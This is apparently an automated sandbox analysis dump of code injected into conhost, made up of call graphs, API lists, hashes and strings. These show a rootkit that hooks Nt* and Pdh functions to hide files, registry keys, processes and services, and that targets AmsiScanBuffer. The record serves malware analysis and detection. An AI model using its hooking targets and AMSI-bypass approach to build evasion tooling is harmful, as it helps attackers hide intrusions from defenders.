9277 1fd186d28fc 9275->9277 9278 1fd186d1ad4 4 API calls 9276->9278 9279 1fd186d299d 9277->9279 9283 1fd186d2906 9277->9283 9278->9277 9280 1fd186d3f88 StrCmpNIW 9279->9280 9282 1fd186d3708 4 API calls 9279->9282 9284 1fd186d1dd4 2 API calls 9279->9284 9279->9286 9280->9279 9281 1fd186d3f88 StrCmpNIW 9281->9283 9282->9279 9283->9281 9285 1fd186d3708 4 API calls 9283->9285 9283->9286 9287 1fd186d1dd4 2 API calls 9283->9287 9284->9279 9285->9283 9287->9283 9288 1fd186df3e4 9289 1fd186df41d 9288->9289 9290 1fd186df3ee 9288->9290 9290->9289 9291 1fd186df403 FreeLibrary 9290->9291 9291->9290 9292 1fd186e33e4 9293 1fd186e33fb 9292->9293 9294 1fd186e33f5 CloseHandle 9292->9294 9294->9293 8740 1fd186d2f64 8742 1fd186d2fc1 8740->8742 8741 1fd186d2fdc 8742->8741 8743 1fd186d38a8 3 API calls 8742->8743 8743->8741 9295 1fd186d63e3 9296 1fd186d63f0 9295->9296 9297 1fd186d63fc GetThreadContext 9296->9297 9298 1fd186d655a 9296->9298 9297->9298 9299 1fd186d6422 9297->9299 9300 1fd186d6581 VirtualProtect FlushInstructionCache 9298->9300 9301 1fd186d663e 9298->9301 9299->9298 9303 1fd186d6449 9299->9303 9300->9298 9302 1fd186d665e 9301->9302 9306 1fd186d4b20 VirtualFree 9301->9306 9304 1fd186d5530 3 API calls 9302->9304 9305 1fd186d64cd 9303->9305 9307 1fd186d64a6 SetThreadContext 9303->9307 9310 1fd186d6663 9304->9310 9306->9302 9307->9305 9308 1fd186d66b7 9311 1fd186d8070 _invalid_parameter_noinfo 8 API calls 9308->9311 9309 1fd186d6677 ResumeThread 9309->9310 9310->9308 9310->9309 9312 1fd186d66ff 9311->9312 8077 1fd186e465f 8078 1fd186e46e2 8077->8078 8079 1fd186e4677 8077->8079 8079->8078 8080 1fd186d9324 _CreateFrameInfo 9 API calls 8079->8080 8081 1fd186e46c4 8080->8081 8082 1fd186d9324 _CreateFrameInfo 9 API calls 8081->8082 8083 1fd186e46d9 8082->8083 8084 1fd186dc2f4 14 API calls 8083->8084 8084->8078 8546 1fd186e06e0 8547 1fd186e06e9 8546->8547 8548 1fd186e06f9 8546->8548 8549 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8547->8549 8550 1fd186e06ee 8549->8550 8551 1fd186dd04c _invalid_parameter_noinfo 38 API calls 8550->8551 8551->8548 8744 1fd186e3960 8754 1fd186d8ca0 8744->8754 8746 1fd186e3988 8748 1fd186d9324 _CreateFrameInfo 9 API calls 8749 1fd186e3998 8748->8749 8750 1fd186d9324 _CreateFrameInfo 9 API calls 8749->8750 8751 1fd186e39a1 8750->8751 8752 1fd186dc2f4 14 API calls 8751->8752 8753 1fd186e39aa 8752->8753 8757 1fd186d8cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8754->8757 8755 1fd186d8dd1 8755->8746 8755->8748 8756 1fd186d8d94 RtlUnwindEx 8756->8757 8757->8755 8757->8756 8758 1fd186d7f60 8759 1fd186d7f7c 8758->8759 8760 1fd186d7f81 8758->8760 8762 1fd186d8090 8759->8762 8763 1fd186d8127 8762->8763 8764 1fd186d80b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8762->8764 8763->8760 8764->8763 8085 1fd186e485e 8086 1fd186d9324 _CreateFrameInfo 9 API calls 8085->8086 8087 1fd186e486c 8086->8087 8088 1fd186e4877 8087->8088 8089 1fd186d9324 _CreateFrameInfo 9 API calls 8087->8089 8089->8088 8090 1fd186e387c 8091 1fd186e38b4 __GSHandlerCheckCommon 8090->8091 8092 1fd186e38e0 8091->8092 8094 1fd186d9a24 8091->8094 8095 1fd186d9324 _CreateFrameInfo 9 API calls 8094->8095 8096 1fd186d9a4e 8095->8096 8097 1fd186d9324 _CreateFrameInfo 9 API calls 8096->8097 8098 1fd186d9a5b 8097->8098 8099 1fd186d9324 _CreateFrameInfo 9 API calls 8098->8099 8100 1fd186d9a64 8099->8100 8100->8092 9313 1fd186d5ff9 9314 1fd186d6000 VirtualProtect 9313->9314 9315 1fd186d6029 GetLastError 9314->9315 9316 1fd186d5f10 9314->9316 9315->9316 9317 1fd186dcbfc 9322 1fd186df3a0 9317->9322 9319 1fd186dcc05 9320 1fd186dcb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 9319->9320 9321 1fd186dcc22 __vcrt_uninitialize_ptd 9319->9321 9320->9321 9323 1fd186df3b1 9322->9323 9324 1fd186df3b5 9322->9324 9323->9319 9324->9323 9325 1fd186def88 9 API calls 9324->9325 9325->9323 9326 1fd186d41f9 9330 1fd186d4146 9326->9330 9327 1fd186d41b0 9328 1fd186d4196 VirtualQuery 9328->9327 9328->9330 9329 1fd186d41ca VirtualAlloc 9329->9327 9331 1fd186d41fb GetLastError 9329->9331 9330->9327 9330->9328 9330->9329 9331->9327 9331->9330 8552 1fd186e46f5 8553 1fd186d9324 _CreateFrameInfo 9 API calls 8552->8553 8554 1fd186e470d 8553->8554 8555 1fd186d9324 _CreateFrameInfo 9 API calls 8554->8555 8556 1fd186e4728 8555->8556 8557 1fd186d9324 _CreateFrameInfo 9 API calls 8556->8557 8558 1fd186e473c 8557->8558 8559 1fd186d9324 _CreateFrameInfo 9 API calls 8558->8559 8560 1fd186e477e 8559->8560 8101 1fd186d8672 8102 1fd186d90c0 __std_exception_copy 38 API calls 8101->8102 8103 1fd186d869d 8102->8103 8765 1fd186d5974 8766 1fd186d597a 8765->8766 8777 1fd186d7fa0 8766->8777 8771 1fd186d5a77 8773 1fd186d5bfd 8771->8773 8775 1fd186d59de 8771->8775 8790 1fd186d7b80 8771->8790 8772 1fd186d5cfb 8773->8772 8774 1fd186d5d77 VirtualProtect 8773->8774 8774->8775 8776 1fd186d5da3 GetLastError 8774->8776 8776->8775 8778 1fd186d7fab 8777->8778 8779 1fd186d59bd 8778->8779 8780 1fd186db470 _invalid_parameter_noinfo 2 API calls 8778->8780 8781 1fd186d7fca 8778->8781 8779->8775 8786 1fd186d4400 8779->8786 8780->8778 8785 1fd186d7fd5 8781->8785 8796 1fd186d87b8 8781->8796 8800 1fd186d87d8 8785->8800 8787 1fd186d441d 8786->8787 8789 1fd186d448c 8787->8789 8804 1fd186d4670 8787->8804 8789->8771 8791 1fd186d7bc7 8790->8791 8829 1fd186d7950 8791->8829 8794 1fd186d8070 _invalid_parameter_noinfo 8 API calls 8795 1fd186d7bf1 8794->8795 8795->8771 8797 1fd186d87c6 std::bad_alloc::bad_alloc 8796->8797 8798 1fd186d9178 Concurrency::cancel_current_task 2 API calls 8797->8798 8799 1fd186d87d7 8798->8799 8801 1fd186d87e6 std::bad_alloc::bad_alloc 8800->8801 8802 1fd186d9178 Concurrency::cancel_current_task 2 API calls 8801->8802 8803 1fd186d7fdb 8802->8803 8805 1fd186d4694 8804->8805 8807 1fd186d46b7 8804->8807 8805->8807 8818 1fd186d4120 8805->8818 8806 1fd186d46ed 8809 1fd186d471d 8806->8809 8812 1fd186d4250 2 API calls 8806->8812 8807->8806 8824 1fd186d4250 8807->8824 8810 1fd186d4753 8809->8810 8814 1fd186d4120 3 API calls 8809->8814 8813 1fd186d476f 8810->8813 8815 1fd186d4120 3 API calls 8810->8815 8812->8809 8816 1fd186d478b 8813->8816 8817 1fd186d4250 2 API calls 8813->8817 8814->8810 8815->8813 8816->8789 8817->8816 8822 1fd186d4141 8818->8822 8819 1fd186d41b0 8819->8807 8820 1fd186d4196 VirtualQuery 8820->8819 8820->8822 8821 1fd186d41ca VirtualAlloc 8821->8819 8823 1fd186d41fb GetLastError 8821->8823 8822->8819 8822->8820 8822->8821 8823->8819 8823->8822 8828 1fd186d4268 8824->8828 8825 1fd186d42bd VirtualQuery 8826 1fd186d42d7 8825->8826 8825->8828 8826->8806 8827 1fd186d4322 GetLastError 8827->8828 8828->8825 8828->8826 8828->8827 8830 1fd186d796b 8829->8830 8831 1fd186d7981 SetLastError 8830->8831 8832 1fd186d798f 8830->8832 8831->8832 8832->8794 8104 1fd186df870 8105 1fd186df8a0 8104->8105 8107 1fd186df8c7 8104->8107 8106 1fd186dcb10 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8105->8106 8105->8107 8111 1fd186df8b4 8105->8111 8106->8111 8108 1fd186df99c 8107->8108 8127 1fd186dc558 EnterCriticalSection 8107->8127 8112 1fd186dfab3 8108->8112 8114 1fd186dfa03 8108->8114 8120 1fd186df9ca 8108->8120 8109 1fd186df904 8111->8107 8111->8109 8113 1fd186df949 8111->8113 8115 1fd186dfac0 8112->8115 8129 1fd186dc5ac LeaveCriticalSection 8112->8129 8116 1fd186dd1f4 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8113->8116 8125 1fd186dfa61 8114->8125 8128 1fd186dc5ac LeaveCriticalSection 8114->8128 8119 1fd186df94e 8116->8119 8122 1fd186dd04c _invalid_parameter_noinfo 38 API calls 8119->8122 8120->8114 8123 1fd186dcab0 _invalid_parameter_noinfo 14 API calls 8120->8123 8121 1fd186dcab0 14 API calls _invalid_parameter_noinfo 8121->8125 8122->8109 8124 1fd186df9f3 8123->8124 8126 1fd186dcab0 _invalid_parameter_noinfo 14 API calls 8124->8126 8125->8121 8126->8114 8833 1fd186df370 VirtualProtect 9332 1fd186d2ff0 9333 1fd186d3061 9332->9333 9334 1fd186d3384 9333->9334 9335 1fd186d308d GetModuleHandleA 9333->9335 9336 1fd186d30b1 9335->9336 9337 1fd186d309f GetProcAddress 9335->9337 9336->9334 9338 1fd186d30d8 StrCmpNIW 9336->9338 9337->9336 9338->9334 9342 1fd186d30fd 9338->9342 9339 1fd186d1a30 6 API calls 9339->9342 9340 1fd186d320f lstrlenW 9340->9342 9341 1fd186d32b9 lstrlenW 9341->9342 9342->9334 9342->9339 9342->9340 9342->9341 9343 1fd186d3f88 StrCmpNIW 9342->9343 9344 1fd186d1cfc StrCmpIW StrCmpW 9342->9344 9343->9342 9344->9342

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
        • API String ID: 1735320900-4225371247
        • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction ID: 3ab70cc3ed0f98afb6f0d0d67f3a2cbc6d0311e7cd00ef3a9efbac45d000c760
        • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
        • Instruction Fuzzy Hash: 65518D70168A4BE5EB01DFA4FC67BF42723B741794F800633E49906269EE7CD25AC384

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: AddressLibraryLoadProcSleep
        • String ID: AmsiScanBuffer$amsi.dll
        • API String ID: 188063004-3248079830
        • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction ID: 2c0d1f4a97177b2f81bdabad3089f78c45ecae046d3e13fced304012e3105e4e
        • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
        • Instruction Fuzzy Hash: 51D067306A9B06D5EB08EB15F85A3F46263BB64F01FC4053AE51A022A4EE6C89598340

        Control-flow Graph

        APIs
        • GetModuleFileNameW.KERNEL32 ref: 000001FD186D3A35
        • PathFindFileNameW.SHLWAPI ref: 000001FD186D3A44
          • Part of subcall function 000001FD186D3F88: StrCmpNIW.SHLWAPI(?,?,?,000001FD186D272F), ref: 000001FD186D3FA0
          • Part of subcall function 000001FD186D3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3EDB
          • Part of subcall function 000001FD186D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F0E
          • Part of subcall function 000001FD186D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F2E
          • Part of subcall function 000001FD186D3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F47
          • Part of subcall function 000001FD186D3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000001FD186D3A5B), ref: 000001FD186D3F68
        • CreateThread.KERNELBASE ref: 000001FD186D3A8B
          • Part of subcall function 000001FD186D1E74: GetCurrentThread.KERNEL32 ref: 000001FD186D1E7F
          • Part of subcall function 000001FD186D1E74: CreateThread.KERNELBASE ref: 000001FD186D2043
          • Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2049
          • Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2055
          • Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2061
          • Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D206D
          • Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2079
          • Part of subcall function 000001FD186D1E74: TlsAlloc.KERNEL32 ref: 000001FD186D2085
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
        • String ID:
        • API String ID: 2779030803-0
        • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction ID: dc76cae71a1b2a600690e53107dbd3ef260399359f937562b423fade14777d86
        • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
        • Instruction Fuzzy Hash: 6A112931718A0382FB60DB21FA5B7F96293A755345F94423AF486821D1FF7DC5448710
        APIs
        Memory Dump Source
        • Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction ID: 8049ee8bfc845017516d99e05b1eaab730a84b2355e2a0350985086645a5ca79
        • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
        • Instruction Fuzzy Hash: 5B9117B2B0565287FB548F25E400BBD7393FB54B98F5A8534AF490779CDA34D81AC710

        Control-flow Graph

        APIs
          • Part of subcall function 000001FD186D1724: GetProcessHeap.KERNEL32 ref: 000001FD186D172F
          • Part of subcall function 000001FD186D1724: HeapAlloc.KERNEL32 ref: 000001FD186D173E
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D17AE
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D17DB
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D17F5
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1815
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D1830
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1850
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D186B
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D188B
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D18A6
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D18C6
        • SleepEx.KERNELBASE ref: 000001FD186D1BDF
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D18E1
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1901
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D191C
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D193C
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D1957
          • Part of subcall function 000001FD186D1724: RegOpenKeyExW.ADVAPI32 ref: 000001FD186D1977
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D1992
          • Part of subcall function 000001FD186D1724: RegCloseKey.ADVAPI32 ref: 000001FD186D199C
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: CloseOpen$Heap$AllocProcessSleep
        • String ID:
        • API String ID: 948135145-0
        • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction ID: 14029be746f34c79a25dc5b310a924c28a860089d37abfbc173fe94b4d2a0025
        • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
        • Instruction Fuzzy Hash: 8331FF75208E43C1FB51DB27F5633F9A3A6AB44BC4F045631EE8987696DFA8C8518218

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 197 1fd186d2ff0-1fd186d3069 199 1fd186d3384-1fd186d33a7 197->199 200 1fd186d306f-1fd186d3075 197->200 200->199 201 1fd186d307b-1fd186d307e 200->201 201->199 202 1fd186d3084-1fd186d3087 201->202 202->199 203 1fd186d308d-1fd186d309d GetModuleHandleA 202->203 204 1fd186d30b1 203->204 205 1fd186d309f-1fd186d30af GetProcAddress 203->205 206 1fd186d30b4-1fd186d30d2 204->206 205->206 206->199 208 1fd186d30d8-1fd186d30f7 StrCmpNIW 206->208 208->199 209 1fd186d30fd-1fd186d3101 208->209 209->199 210 1fd186d3107-1fd186d3111 209->210 210->199 211 1fd186d3117-1fd186d311e 210->211 211->199 212 1fd186d3124-1fd186d3137 211->212 213 1fd186d3139-1fd186d3145 212->213 214 1fd186d3147 212->214 215 1fd186d314a-1fd186d314e 213->215 214->215 216 1fd186d315e 215->216 217 1fd186d3150-1fd186d315c 215->217 218 1fd186d3161-1fd186d316b 216->218 217->218 219 1fd186d3251-1fd186d3255 218->219 220 1fd186d3171-1fd186d3174 218->220 221 1fd186d325b-1fd186d325e 219->221 222 1fd186d3376-1fd186d337e 219->222 223 1fd186d3186-1fd186d3190 220->223 224 1fd186d3176-1fd186d3183 call 1fd186d1a30 220->224 225 1fd186d3260-1fd186d326c call 1fd186d1a30 221->225 226 1fd186d326f-1fd186d3279 221->226 222->199 222->212 228 1fd186d3192-1fd186d319f 223->228 229 1fd186d31c4-1fd186d31ce 223->229 224->223 225->226 233 1fd186d32a9-1fd186d32ac 226->233 234 1fd186d327b-1fd186d3288 226->234 228->229 236 1fd186d31a1-1fd186d31ae 228->236 230 1fd186d31fe-1fd186d3201 229->230 231 1fd186d31d0-1fd186d31dd 229->231 240 1fd186d3203-1fd186d320d call 1fd186d1cc4 230->240 241 1fd186d320f-1fd186d321c lstrlenW 230->241 231->230 238 1fd186d31df-1fd186d31ec 231->238 243 1fd186d32b9-1fd186d32c6 lstrlenW 233->243 244 1fd186d32ae-1fd186d32b7 call 1fd186d1cc4 233->244 234->233 242 1fd186d328a-1fd186d3297 234->242 237 1fd186d31b1-1fd186d31b7 236->237 245 1fd186d3247-1fd186d324c 237->245 246 1fd186d31bd-1fd186d31c2 237->246 249 1fd186d31ef-1fd186d31f5 238->249 240->241 240->245 252 1fd186d321e-1fd186d322d call 1fd186d1cfc 241->252 253 1fd186d322f-1fd186d3241 call 1fd186d3f88 241->253 251 1fd186d329a-1fd186d32a0 242->251 247 1fd186d32d9-1fd186d32e3 call 1fd186d3f88 243->247 248 1fd186d32c8-1fd186d32d7 call 1fd186d1cfc 243->248 244->243 263 1fd186d32ee-1fd186d32f9 244->263 257 1fd186d32e6-1fd186d32e8 245->257 246->229 246->237 247->257 248->247 248->263 249->245 260 1fd186d31f7-1fd186d31fc 249->260 262 1fd186d32a2-1fd186d32a7 251->262 251->263 252->245 252->253 253->245 253->257 257->222 257->263 260->230 260->249 262->233 262->251 268 1fd186d32fb-1fd186d32ff 263->268 269 1fd186d3370-1fd186d3374 263->269 271 1fd186d3307-1fd186d3321 call 1fd186e3a40 268->271 272 1fd186d3301-1fd186d3305 268->272 269->222 273 1fd186d3324-1fd186d3327 271->273 272->271 272->273 275 1fd186d334a-1fd186d334d 273->275 276 1fd186d3329-1fd186d3347 call 1fd186e3a40 273->276 275->269 279 1fd186d334f-1fd186d336d call 1fd186e3a40 275->279 276->275 279->269
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
        • API String ID: 2119608203-3850299575
        • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction ID: cc6e2e2e15b06062f4a64839b6d398d266d4f5e1479dee90d303672ba5026404
        • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
        • Instruction Fuzzy Hash: 1DB17272618A92C2EB65CF25EA427F9A3A6F744B84F44513AFE8993794EF35CD40C340
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
        • String ID:
        • API String ID: 3140674995-0
        • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction ID: 881dc891a631f31a30cb2754b219b3a6eed23e56a74c3a5b89656694351ab33e
        • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
        • Instruction Fuzzy Hash: 67311972209B818AEB60CF60F8857FE7365F784748F44452AEA4E47B99EF78C648C710
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
        • String ID:
        • API String ID: 1239891234-0
        • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction ID: c48cd9ed9c1a29073b9291b38c582e778ac41096372f7dadae3a213965ce2fbe
        • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
        • Instruction Fuzzy Hash: F8413936218B8186EB60CB25F8463FE73A5F788758F500625EA9D47B99EF38C555CB00
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Find$CloseFile$FirstNext
        • String ID:
        • API String ID: 1164774033-0
        • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
        • Instruction ID: b17bca77d18002a47f6d22b5c89c05dfadeb35c11e09e261ce113dd731e9bc8b
